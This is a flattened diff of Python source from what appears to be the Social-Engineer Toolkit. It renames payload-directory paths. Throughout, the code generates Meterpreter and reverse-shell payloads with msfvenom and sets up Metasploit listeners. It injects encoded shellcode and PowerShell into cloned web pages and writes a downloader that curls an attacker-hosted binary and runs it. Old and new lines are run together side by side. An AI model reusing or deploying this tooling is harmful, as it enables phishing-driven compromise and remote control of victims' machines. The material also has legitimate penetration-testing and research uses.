# here is a place holder for the multi attack java # here is a place holder for the multi attack java
# multiattack outputs a file called multi_java if # multiattack outputs a file called multi_java if
# this file is present it will allow additional # this file is present it will allow additional
# functionality # functionality
multiattack_java = "off" multiattack_java = "off"
if os.path.isfile(setdir + "/multi_java"): if os.path.isfile(userconfigpath + "multi_java"):
multiattack_java = "on" multiattack_java = "on"
# custom payloadgen # custom payloadgen
payloadgen = "regular" payloadgen = "regular"
if os.path.isfile(setdir + "/payloadgen"): if os.path.isfile(userconfigpath + "payloadgen"):
payloadgen = "solo" payloadgen = "solo"
# #
@ -117,8 +117,8 @@ try:
choice1 = "" choice1 = ""
# this is port # this is port
choice3 = "" choice3 = ""
if os.path.isfile(setdir + "/meterpreter_reverse_tcp_exe"): if os.path.isfile(userconfigpath + "meterpreter_reverse_tcp_exe"):
fileopen = open(setdir + "/meterpreter_reverse_tcp_exe", "r") fileopen = open(userconfigpath + "meterpreter_reverse_tcp_exe", "r")
for line in fileopen: for line in fileopen:
# this reads in the first line of the file which happens to be port # this reads in the first line of the file which happens to be port
# when calling through core # when calling through core
@ -182,7 +182,7 @@ try:
encoder = 'false' encoder = 'false'
payloadgen = 'solo' payloadgen = 'solo'
encode_stop = 1 encode_stop = 1
filewrite = open(setdir + "/set.payload", "w") filewrite = open(userconfigpath + "set.payload", "w")
# select setshell # select setshell
if choice1 == '3': if choice1 == '3':
filewrite.write("SETSHELL") filewrite.write("SETSHELL")
@ -217,11 +217,11 @@ try:
# if we are using our own executable # if we are using our own executable
if custom == 1: if custom == 1:
check_write = open(setdir + "/custom.exe", "w") check_write = open(userconfigpath + "custom.exe", "w")
check_write.write("VALID") check_write.write("VALID")
check_write.close() check_write.close()
shutil.copyfile("%s" % (choice1), "msf.exe") shutil.copyfile("%s" % (choice1), "msf.exe")
shutil.copyfile("msf.exe", setdir + "/msf.exe") shutil.copyfile("msf.exe", userconfigpath + "msf.exe")
# Specify Encoding Option # Specify Encoding Option
encoder = "false" encoder = "false"
@ -232,12 +232,12 @@ try:
if choice1 != "set/reverse_shell": if choice1 != "set/reverse_shell":
# we need to rewrite index.html real quick because it has a parameter # we need to rewrite index.html real quick because it has a parameter
# that could get confusing # that could get confusing
if os.path.isfile(setdir + "/web_clone/index.html"): if os.path.isfile(userconfigpath + "web_clone/index.html"):
fileopen = open(setdir + "/web_clone/index.html", "r") fileopen = open(userconfigpath + "web_clone/index.html", "r")
data = fileopen.read() data = fileopen.read()
data = data.replace("freehugs", "") data = data.replace("freehugs", "")
os.remove(setdir + "/web_clone/index.html") os.remove(userconfigpath + "web_clone/index.html")
filewrite = open(setdir + "/web_clone/index.html", "w") filewrite = open(userconfigpath + "web_clone/index.html", "w")
filewrite.write(data) filewrite.write(data)
filewrite.close() filewrite.close()
@ -276,7 +276,7 @@ try:
# if we are using the SET interactive shell then do this # if we are using the SET interactive shell then do this
if choice1 == "set/reverse_shell": if choice1 == "set/reverse_shell":
encoder = "false" encoder = "false"
filewrite = open(setdir + "/set.payload.posix", "w") filewrite = open(userconfigpath + "set.payload.posix", "w")
filewrite.write("true") filewrite.write("true")
filewrite.close() filewrite.close()
import src.core.payloadprep import src.core.payloadprep
@ -330,7 +330,7 @@ try:
if choice1 == "shellcode/alphanum": if choice1 == "shellcode/alphanum":
print_status("Generating the payload via msfvenom and generating alphanumeric shellcode...") print_status("Generating the payload via msfvenom and generating alphanumeric shellcode...")
subprocess.Popen("%smsfvenom -p %s LHOST=%s %s StagerURILength=5 StagerVerifySSLCert=false -e EXITFUNC=thread -e x86/alpha_mixed --format raw BufferRegister=EAX > %s/meterpreter.alpha_decoded" % (meta_path(), choice9, choice2, portnum, setdir), shell=True).wait() subprocess.Popen("%smsfvenom -p %s LHOST=%s %s StagerURILength=5 StagerVerifySSLCert=false -e EXITFUNC=thread -e x86/alpha_mixed --format raw BufferRegister=EAX > %s/meterpreter.alpha_decoded" % (meta_path(), choice9, choice2, portnum, userconfigpath), shell=True).wait()
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject" or choice1 == "cmd/multi": if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject" or choice1 == "cmd/multi":
# here we update set options to specify pyinjection and multipy # here we update set options to specify pyinjection and multipy
@ -339,16 +339,16 @@ try:
# define, this will eventually be all of our payloads # define, this will eventually be all of our payloads
multipyinject_payload = "" multipyinject_payload = ""
# clean up old file # clean up old file
if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
os.remove("%s/meta_config_multipyinjector" % (setdir)) os.remove("%s/meta_config_multipyinjector" % (userconfigpath))
# remove any old payload options # remove any old payload options
if os.path.isfile(setdir + "/payload.options.shellcode"): if os.path.isfile(userconfigpath + "payload.options.shellcode"):
os.remove(setdir + "/payload_options.shellcode") os.remove(userconfigpath + "payload_options.shellcode")
# this is the file that gets saved with the payload and # this is the file that gets saved with the payload and
# port options # port options
if choice1 != "cmd/multi": payload_options = open(setdir + "/payload_options.shellcode", "a") if choice1 != "cmd/multi": payload_options = open(userconfigpath + "payload_options.shellcode", "a")
while 1: while 1:
# don't need any options here # don't need any options here
@ -385,8 +385,8 @@ try:
# here we prep our meta config to listen on all # here we prep our meta config to listen on all
# the ports we want - free hugs all around # the ports we want - free hugs all around
filewrite = open("%s/meta_config_multipyinjector" % (setdir), "a") filewrite = open("%s/meta_config_multipyinjector" % (userconfigpath), "a")
port_check = check_ports("%s/meta_config_multipyinjector" % (setdir), shellcode_port) port_check = check_ports("%s/meta_config_multipyinjector" % (userconfigpath), shellcode_port)
if port_check == False: if port_check == False:
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset EnableStageEncoding %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (choice9, stage_encoding, ipaddr, shellcode_port)) filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset EnableStageEncoding %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (choice9, stage_encoding, ipaddr, shellcode_port))
filewrite.close() filewrite.close()
@ -453,7 +453,7 @@ try:
shellcode = encryptAES(secret, multipyinject_payload) shellcode = encryptAES(secret, multipyinject_payload)
print_status("Dynamic cipher key created and embedded into payload.") print_status("Dynamic cipher key created and embedded into payload.")
filewrite = open("%s/meterpreter.alpha_decoded" % (setdir), "w") filewrite = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "w")
filewrite.write(shellcode) filewrite.write(shellcode)
filewrite.close() filewrite.close()
@ -462,7 +462,7 @@ try:
payload_options.close() payload_options.close()
# here we are going to encode the payload via base64 # here we are going to encode the payload via base64
fileopen = open("%s/meterpreter.alpha_decoded" % (setdir), "r") fileopen = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "r")
data = fileopen.read() data = fileopen.read()
if payloadgen != "solo": if payloadgen != "solo":
# base64 1 # base64 1
@ -489,7 +489,7 @@ try:
# last one # last one
data = base64.b64encode(b'data') data = base64.b64encode(b'data')
# #
filewrite = open("%s/meterpreter.alpha" % (setdir), "w") filewrite = open("%s/meterpreter.alpha" % (userconfigpath), "w")
filewrite.write(str(data)) filewrite.write(str(data))
filewrite.close() filewrite.close()
if choice1 == "shellcode/alphanum": if choice1 == "shellcode/alphanum":
@ -510,17 +510,17 @@ try:
# write out the payload # write out the payload
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyiject": if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyiject":
filewrite = open(setdir + "/msf.exe", "wb") filewrite = open(userconfigpath + "msf.exe", "wb")
filewrite.write(fileopen) filewrite.write(fileopen)
filewrite.close() filewrite.close()
subprocess.Popen("cp %s/shellcodeexec.custom %s/msf.exe 1> /dev/null 2> /dev/null" % (setdir, setdir), shell=True).wait() subprocess.Popen("cp %s/shellcodeexec.custom %s/msf.exe 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait()
# we need to read in the old index.html file because its # we need to read in the old index.html file because its
# already generated, need to present the alphanum to it # already generated, need to present the alphanum to it
if os.path.isfile("%s/web_clone/index.html" % (setdir)): if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
fileopen = open("%s/web_clone/index.html" %(setdir), "r") fileopen = open("%s/web_clone/index.html" %(userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (setdir), "w") filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
fileopen2 = open("%s/meterpreter.alpha" % (setdir), "r") fileopen2 = open("%s/meterpreter.alpha" % (userconfigpath), "r")
alpha_shellcode = fileopen2.read().rstrip() alpha_shellcode = fileopen2.read().rstrip()
data = fileopen.read() data = fileopen.read()
data = data.replace( data = data.replace(
@ -539,7 +539,7 @@ try:
if choice1 == "shellcode/pyinject": if choice1 == "shellcode/pyinject":
print_status("Prepping website for pyInjector shellcode injection..") print_status("Prepping website for pyInjector shellcode injection..")
print_status("Base64 encoding shellcode and prepping for delivery..") print_status("Base64 encoding shellcode and prepping for delivery..")
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html 1> /dev/null 2> /dev/null" % (setdir, setdir), shell=True).wait() subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait()
if choice9 == "windows/meterpreter/reverse_tcp_allports": if choice9 == "windows/meterpreter/reverse_tcp_allports":
portnum = "LPORT=1" portnum = "LPORT=1"
choice3 = "1" choice3 = "1"
@ -551,7 +551,7 @@ try:
choice1 = choice9 choice1 = choice9
# write out the payload for powershell injection to pick it up if used # write out the payload for powershell injection to pick it up if used
filewrite = open(setdir + "/metasploit.payload", "w") filewrite = open(userconfigpath + "metasploit.payload", "w")
filewrite.write(choice1) filewrite.write(choice1)
filewrite.close() filewrite.close()
# import if on # import if on
@ -563,12 +563,12 @@ try:
setshell_counter = 1 setshell_counter = 1
if setshell_counter == 0: if setshell_counter == 0:
if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum": if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum":
if os.path.isfile("%s/web_clone/index.html" % (setdir)): if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
if choice1 != "cmd/multi": if choice1 != "cmd/multi":
try: core.module_reload(src.payloads.powershell.prep) try: core.module_reload(src.payloads.powershell.prep)
except: import src.payloads.powershell.prep except: import src.payloads.powershell.prep
if os.path.isfile("%s/x86.powershell" % (setdir)): if os.path.isfile("%s/x86.powershell" % (userconfigpath)):
fileopen1 = open("%s/x86.powershell" % (setdir), "r") fileopen1 = open("%s/x86.powershell" % (userconfigpath), "r")
x86 = fileopen1.read() x86 = fileopen1.read()
x86 = "powershell -ec " + x86 x86 = "powershell -ec " + x86
@ -586,8 +586,8 @@ try:
print_status("Embedding commands into Java Applet parameters...") print_status("Embedding commands into Java Applet parameters...")
print_status("Note that these will be base64-encoded once, regardless of the payload..") print_status("Note that these will be base64-encoded once, regardless of the payload..")
fileopen3 = open("%s/web_clone/index.html" % (setdir), "r") fileopen3 = open("%s/web_clone/index.html" % (userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (setdir), "w") filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
data = fileopen3.read() data = fileopen3.read()
# encode once, will need to decode later # encode once, will need to decode later
@ -605,19 +605,19 @@ try:
filewrite.write(data) filewrite.write(data)
filewrite.close() filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir, setdir), stdout=subprocess.PIPE, shell=True).wait() subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, shell=True).wait()
# here we specify the binary to deploy if we are using ones that are # here we specify the binary to deploy if we are using ones that are
# required to drop binaries # required to drop binaries
if custom == 1 or choice1 == "set/reverse_shell" or choice1 == "shellcode/alphanum" or choice1 == "cmd/multi": if custom == 1 or choice1 == "set/reverse_shell" or choice1 == "shellcode/alphanum" or choice1 == "cmd/multi":
fileopen3 = fileopen = open("%s/web_clone/index.html" % (setdir), "r") fileopen3 = fileopen = open("%s/web_clone/index.html" % (userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (setdir), "w") filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
data = fileopen3.read() data = fileopen3.read()
# check if we don't want to deploy binaries # check if we don't want to deploy binaries
data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"') data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"')
filewrite.write(data) filewrite.write(data)
filewrite.close() filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
# specify attack vector as SET interactive shell # specify attack vector as SET interactive shell
if choice1 == "set/reverse_shell": if choice1 == "set/reverse_shell":
@ -657,7 +657,7 @@ try:
if osx_path != "": if osx_path != "":
# copy the payload # copy the payload
shutil.copyfile(osx_path, setdir + "/mac.bin") shutil.copyfile(osx_path, userconfigpath + "mac.bin")
# if linux payload # if linux payload
if lin_path != "": if lin_path != "":
@ -672,7 +672,7 @@ try:
if lin_path != "": if lin_path != "":
# copy the payload # copy the payload
shutil.copyfile(lin_path, setdir + "/nix.bin") shutil.copyfile(lin_path, userconfigpath + "nix.bin")
else: else:
@ -680,9 +680,9 @@ try:
osxpayload = check_config("OSX_PAYLOAD_DELIVERY=") osxpayload = check_config("OSX_PAYLOAD_DELIVERY=")
linuxpayload = check_config("LINUX_PAYLOAD_DELIVERY=") linuxpayload = check_config("LINUX_PAYLOAD_DELIVERY=")
print_status("Generating OSX payloads through Metasploit...") print_status("Generating OSX payloads through Metasploit...")
subprocess.Popen(r"msfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin" % (meta_path(), osxpayload, choice2, port1, setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() subprocess.Popen(r"msfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin" % (meta_path(), osxpayload, choice2, port1, userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print_status("Generating Linux payloads through Metasploit...") print_status("Generating Linux payloads through Metasploit...")
subprocess.Popen(r"%smsfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/nix.bin" % (meta_path(), linuxpayload, choice2, port2, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() subprocess.Popen(r"%smsfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/nix.bin" % (meta_path(), linuxpayload, choice2, port2, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if multiattack_java == "on": if multiattack_java == "on":
multiattack.write("OSX=" + str(port1) + "\n") multiattack.write("OSX=" + str(port1) + "\n")
multiattack.write("OSXPAYLOAD=%s\n" % (osxpayload)) multiattack.write("OSXPAYLOAD=%s\n" % (osxpayload))
@ -691,24 +691,24 @@ try:
osxcheck = check_options("MAC.BIN=") osxcheck = check_options("MAC.BIN=")
linuxcheck = check_options("NIX.BIN=") linuxcheck = check_options("NIX.BIN=")
shutil.copyfile(setdir + "/mac.bin", setdir + "/web_clone/%s" % (osxcheck)) shutil.copyfile(userconfigpath + "mac.bin", userconfigpath + "web_clone/%s" % (osxcheck))
shutil.copyfile(setdir + "/nix.bin", setdir + "/web_clone/%s" % (linuxcheck)) shutil.copyfile(userconfigpath + "nix.bin", userconfigpath + "web_clone/%s" % (linuxcheck))
# try block here # try block here
try: try:
# if they want a listener, start here # if they want a listener, start here
if os.path.isfile("%s/meta_config" % (setdir)): if os.path.isfile("%s/meta_config" % (userconfigpath)):
# if its already created # if its already created
filewrite = open("%s/meta_config" % (setdir), "a") filewrite = open("%s/meta_config" % (userconfigpath), "a")
if not os.path.isfile("%s/meta_config" % (setdir)): if not os.path.isfile("%s/meta_config" % (userconfigpath)):
# if we need to create it # if we need to create it
filewrite = open("%s/meta_config" % (setdir), "w") filewrite = open("%s/meta_config" % (userconfigpath), "w")
# if there isn't a multiattack metasploit, setup handler # if there isn't a multiattack metasploit, setup handler
if not os.path.isfile("%s/multi_meta" % (setdir)): if not os.path.isfile("%s/multi_meta" % (userconfigpath)):
port_check = check_ports("%s/meta_config" % (setdir), choice3) port_check = check_ports("%s/meta_config" % (userconfigpath), choice3)
if port_check == False: if port_check == False:
filewrite.write("use exploit/multi/handler\n") filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD " + choice1 + "\n") filewrite.write("set PAYLOAD " + choice1 + "\n")
@ -726,10 +726,10 @@ try:
# config option for using multiscript meterpreter # config option for using multiscript meterpreter
if meterpreter_multi == "ON": if meterpreter_multi == "ON":
multiwrite = open(setdir + "/multi_meter.file", "w") multiwrite = open(userconfigpath + "multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command) multiwrite.write(meterpreter_multi_command)
filewrite.write( filewrite.write(
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (setdir)) "set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (userconfigpath))
multiwrite.close() multiwrite.close()
filewrite.write("exploit -j\r\n\r\n") filewrite.write("exploit -j\r\n\r\n")
@ -759,10 +759,10 @@ try:
filewrite.write("set LPORT " + port2 + "\n") filewrite.write("set LPORT " + port2 + "\n")
if linux_meterpreter_multi == "ON": if linux_meterpreter_multi == "ON":
multiwrite = open( multiwrite = open(
setdir + "/lin_multi_meter.file", "w") userconfigpath + "lin_multi_meter.file", "w")
multiwrite.write(linux_meterpreter_multi_command) multiwrite.write(linux_meterpreter_multi_command)
filewrite.write( filewrite.write(
"set InitialAutorunScript multiscript -rc %s/lin_multi_meter.file\n" % (setdir)) "set InitialAutorunScript multiscript -rc %s/lin_multi_meter.file\n" % (userconfigpath))
multiwrite.close() multiwrite.close()
filewrite.write("set ExitOnSession false\n") filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n") filewrite.write("exploit -j\r\n\r\n")
@ -781,11 +781,11 @@ except KeyboardInterrupt:
# finish closing up the remenant files # finish closing up the remenant files
if attack_vector == "multiattack": if attack_vector == "multiattack":
multiattack.close() multiattack.close()
if os.path.isfile("%s/fileformat.file" % (setdir)): if os.path.isfile("%s/fileformat.file" % (userconfigpath)):
filewrite = open("%s/payload.options" % (setdir), "w") filewrite = open("%s/payload.options" % (userconfigpath), "w")
filewrite.write(choice1 + " " + ipaddr + " " + choice3) filewrite.write(choice1 + " " + ipaddr + " " + choice3)
filewrite.close() filewrite.close()
if choice1 == "set/reverse_shell": if choice1 == "set/reverse_shell":
if os.path.isfile(setdir + "/meta_config"): if os.path.isfile(userconfigpath + "meta_config"):
os.remove(setdir + "/meta_config") os.remove(userconfigpath + "meta_config")

8
src/core/payloadgen/solo.py
View file

@ -16,14 +16,14 @@ meta_path = meta_path()
def payload_generate(payload, lhost, port): def payload_generate(payload, lhost, port):
# generate metasploit # generate metasploit
subprocess.Popen(meta_path + "msfvenom -p %s LHOST=%s LPORT=%s --format=exe > %s/payload.exe" % subprocess.Popen(meta_path + "msfvenom -p %s LHOST=%s LPORT=%s --format=exe > %s/payload.exe" %
(payload, lhost, port, setdir), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait() (payload, lhost, port, userconfigpath), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()
# write out the rc file # write out the rc file
filewrite = open(setdir + "/meta_config", "w") filewrite = open(userconfigpath + "meta_config", "w")
filewrite.write( filewrite.write(
"use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (payload, lhost, port)) "use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (payload, lhost, port))
filewrite.close() filewrite.close()
print_status( print_status(
"Payload has been exported to the default SET directory located under: " + setdir + "/payload.exe") "Payload has been exported to the default SET directory located under: " + userconfigpath + "payload.exe")
show_payload_menu2 = create_menu(payload_menu_2_text, payload_menu_2) show_payload_menu2 = create_menu(payload_menu_2_text, payload_menu_2)
payload = (raw_input(setprompt(["4"], ""))) payload = (raw_input(setprompt(["4"], "")))
@ -49,4 +49,4 @@ if check_options("INFECTION_MEDIA=") != "ON":
print_status( print_status(
"Launching msfconsole, this could take a few to load. Be patient...") "Launching msfconsole, this could take a few to load. Be patient...")
subprocess.Popen(meta_path + "msfconsole -r " + subprocess.Popen(meta_path + "msfconsole -r " +
setdir + "/meta_config", shell=True).wait() userconfigpath + "meta_config", shell=True).wait()

120
src/core/payloadprep.py
View file

@ -43,12 +43,12 @@ for line in fileopen:
"\n [-] SET Interactive Mode is set to DISABLED. Please change it in the SET config") "\n [-] SET Interactive Mode is set to DISABLED. Please change it in the SET config")
# make directory if it's not there # make directory if it's not there
if not os.path.isdir(setdir + "/web_clone/"): if not os.path.isdir(userconfigpath + "web_clone/"):
os.makedirs(setdir + "/web_clone/") os.makedirs(userconfigpath + "web_clone/")
# grab ip address and SET web server interface # grab ip address and SET web server interface
if os.path.isfile(setdir + "/interface"): if os.path.isfile(userconfigpath + "interface"):
fileopen = open(setdir + "interface", "r") fileopen = open(userconfigpath + "interface", "r")
for line in fileopen: for line in fileopen:
ipaddr = line.rstrip() ipaddr = line.rstrip()
@ -94,8 +94,8 @@ webserver = exe_name + " " + webserver
# this is generated through payloadgen.py and lets SET know if its a RATTE # this is generated through payloadgen.py and lets SET know if its a RATTE
# payload or SET payload # payload or SET payload
if os.path.isfile(setdir + "/set.payload"): if os.path.isfile(userconfigpath + "set.payload"):
fileopen = open(setdir + "/set.payload", "r") fileopen = open(userconfigpath + "set.payload", "r")
for line in fileopen: for line in fileopen:
payload_selection = line.rstrip() payload_selection = line.rstrip()
else: else:
@ -105,7 +105,7 @@ else:
# determine if we want to target osx/nix as well # determine if we want to target osx/nix as well
posix = False posix = False
# find if we selected it # find if we selected it
if os.path.isfile(setdir + "/set.payload.posix"): if os.path.isfile(userconfigpath + "set.payload.posix"):
# if we have then claim true # if we have then claim true
posix = True posix = True
@ -114,20 +114,20 @@ if payload_selection == "SETSHELL":
# replace ipaddress with one that we need for reverse connection back # replace ipaddress with one that we need for reverse connection back
fileopen = open("src/payloads/set_payloads/downloader.windows", "rb") fileopen = open("src/payloads/set_payloads/downloader.windows", "rb")
data = fileopen.read() data = fileopen.read()
filewrite = open(setdir + "/msf.exe", "wb") filewrite = open(userconfigpath + "msf.exe", "wb")
host = int(len(exe_name) + 1) * "X" host = int(len(exe_name) + 1) * "X"
webserver_count = int(len(webserver) + 1) * "S" webserver_count = int(len(webserver) + 1) * "S"
ipaddr_count = int(len(ipaddr) + 1) * "M" ipaddr_count = int(len(ipaddr) + 1) * "M"
filewrite.write(data.replace(str(host), exe_name + "\x00", 1)) filewrite.write(data.replace(str(host), exe_name + "\x00", 1))
filewrite.close() filewrite.close()
fileopen = open(setdir + "/msf.exe", "rb") fileopen = open(userconfigpath + "msf.exe", "rb")
data = fileopen.read() data = fileopen.read()
filewrite = open(setdir + "/msf.exe", "wb") filewrite = open(userconfigpath + "msf.exe", "wb")
filewrite.write(data.replace(str(webserver_count), webserver + "\x00", 1)) filewrite.write(data.replace(str(webserver_count), webserver + "\x00", 1))
filewrite.close() filewrite.close()
fileopen = open(setdir + "/msf.exe", "rb") fileopen = open(userconfigpath + "msf.exe", "rb")
data = fileopen.read() data = fileopen.read()
filewrite = open(setdir + "/msf.exe", "wb") filewrite = open(userconfigpath + "msf.exe", "wb")
filewrite.write(data.replace(str(ipaddr_count), ipaddr + "\x00", 1)) filewrite.write(data.replace(str(ipaddr_count), ipaddr + "\x00", 1))
filewrite.close() filewrite.close()
@ -135,14 +135,14 @@ if payload_selection == "SETSHELL":
if payload_selection == "RATTE": if payload_selection == "RATTE":
fileopen = open("src/payloads/ratte/ratte.binary", "rb") fileopen = open("src/payloads/ratte/ratte.binary", "rb")
data = fileopen.read() data = fileopen.read()
filewrite = open(setdir + "/msf.exe", "wb") filewrite = open(userconfigpath + "msf.exe", "wb")
host = int(len(ipaddr) + 1) * "X" host = int(len(ipaddr) + 1) * "X"
rPort = int(len(str(port)) + 1) * "Y" rPort = int(len(str(port)) + 1) * "Y"
filewrite.write(data.replace(str(host), ipaddr + "\x00", 1)) filewrite.write(data.replace(str(host), ipaddr + "\x00", 1))
filewrite.close() filewrite.close()
fileopen = open(setdir + "/msf.exe", "rb") fileopen = open(userconfigpath + "msf.exe", "rb")
data = fileopen.read() data = fileopen.read()
filewrite = open(setdir + "/msf.exe", "wb") filewrite = open(userconfigpath + "msf.exe", "wb")
filewrite.write(data.replace(str(rPort), str(port) + "\x00", 1)) filewrite.write(data.replace(str(rPort), str(port) + "\x00", 1))
filewrite.close() filewrite.close()
@ -152,22 +152,22 @@ if upx_encode == "ON" or upx_encode == "on":
# core upx # core upx
pass pass
if os.path.isfile(setdir + "/web_clone/msf.exe"): if os.path.isfile(userconfigpath + "web_clone/msf.exe"):
os.remove(setdir + "/web_clone/msf.exe") os.remove(userconfigpath + "web_clone/msf.exe")
if os.path.isfile(setdir + "/msf.exe"): if os.path.isfile(userconfigpath + "msf.exe"):
shutil.copyfile(setdir + "/msf.exe", setdir + "/web_clone/msf.exe") shutil.copyfile(userconfigpath + "msf.exe", userconfigpath + "web_clone/msf.exe")
if payload_selection == "SETSHELL": if payload_selection == "SETSHELL":
if os.path.isfile(setdir + "/web_clone/x"): if os.path.isfile(userconfigpath + "web_clone/x"):
os.remove(setdir + "/web_clone/x") os.remove(userconfigpath + "web_clone/x")
shutil.copyfile("%s/src/payloads/set_payloads/shell.windows" % shutil.copyfile("%s/src/payloads/set_payloads/shell.windows" %
(definepath), setdir + "/web_clone/x") (definepath), userconfigpath + "web_clone/x")
# if we are targetting nix # if we are targetting nix
if posix == True: if posix == True:
print_info( print_info(
"Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...") "Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...")
filewrite = open(setdir + "/web_clone/mac.bin", "w") filewrite = open(userconfigpath + "web_clone/mac.bin", "w")
payload_flags = webserver.split(" ") payload_flags = webserver.split(" ")
# grab osx binary name # grab osx binary name
osx_name = generate_random_string(10, 10) osx_name = generate_random_string(10, 10)
@ -255,21 +255,21 @@ if posix == True:
linux_name = generate_random_string(10, 10) linux_name = generate_random_string(10, 10)
downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % ( downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (
payload_flags[1], linux_name, linux_name, linux_name, payload_flags[1], payload_flags[2]) payload_flags[1], linux_name, linux_name, linux_name, payload_flags[1], payload_flags[2])
filewrite = open(setdir + "/web_clone/nix.bin", "w") filewrite = open(userconfigpath + "web_clone/nix.bin", "w")
filewrite.write(downloader) filewrite.write(downloader)
filewrite.close() filewrite.close()
shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.osx", shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.osx",
setdir + "/web_clone/%s" % (osx_name)) userconfigpath + "web_clone/%s" % (osx_name))
shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.linux", shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.linux",
setdir + "/web_clone/%s" % (linux_name)) userconfigpath + "web_clone/%s" % (linux_name))
# copy over the downloader scripts # copy over the downloader scripts
osx_down = check_options("MAC.BIN=") osx_down = check_options("MAC.BIN=")
lin_down = check_options("NIX.BIN=") lin_down = check_options("NIX.BIN=")
shutil.copyfile(setdir + "/web_clone/nix.bin", shutil.copyfile(userconfigpath + "web_clone/nix.bin",
setdir + "/web_clone/%s" % (lin_down)) userconfigpath + "web_clone/%s" % (lin_down))
shutil.copyfile(setdir + "/web_clone/mac.bin", shutil.copyfile(userconfigpath + "web_clone/mac.bin",
setdir + "/web_clone/%s" % (osx_down)) userconfigpath + "web_clone/%s" % (osx_down))
# check to see if we are using a staged approach or direct shell # check to see if we are using a staged approach or direct shell
stager = check_config("SET_SHELL_STAGER=").lower() stager = check_config("SET_SHELL_STAGER=").lower()
@ -277,11 +277,11 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP":
# only trigger if we are using the SETSHELL # only trigger if we are using the SETSHELL
if payload_selection == "SETSHELL" or payload_selection == "SETSHELL_HTTP": if payload_selection == "SETSHELL" or payload_selection == "SETSHELL_HTTP":
# ensure that index.html is really there # ensure that index.html is really there
if os.path.isfile(setdir + "/web_clone/index.html"): if os.path.isfile(userconfigpath + "web_clone/index.html"):
print_status( print_status(
"Stager turned off, prepping direct download payload...") "Stager turned off, prepping direct download payload...")
fileopen = open(setdir + "/web_clone/index.html", "r") fileopen = open(userconfigpath + "web_clone/index.html", "r")
filewrite = open(setdir + "/web_clone/index.html.3", "w") filewrite = open(userconfigpath + "web_clone/index.html.3", "w")
data = fileopen.read() data = fileopen.read()
# replace freehugs with ip and port # replace freehugs with ip and port
data = data.replace("freehugs", reverse_connection) data = data.replace("freehugs", reverse_connection)
@ -293,22 +293,22 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP":
# be newer # be newer
if payload_selection == "SETSHELL": if payload_selection == "SETSHELL":
try: try:
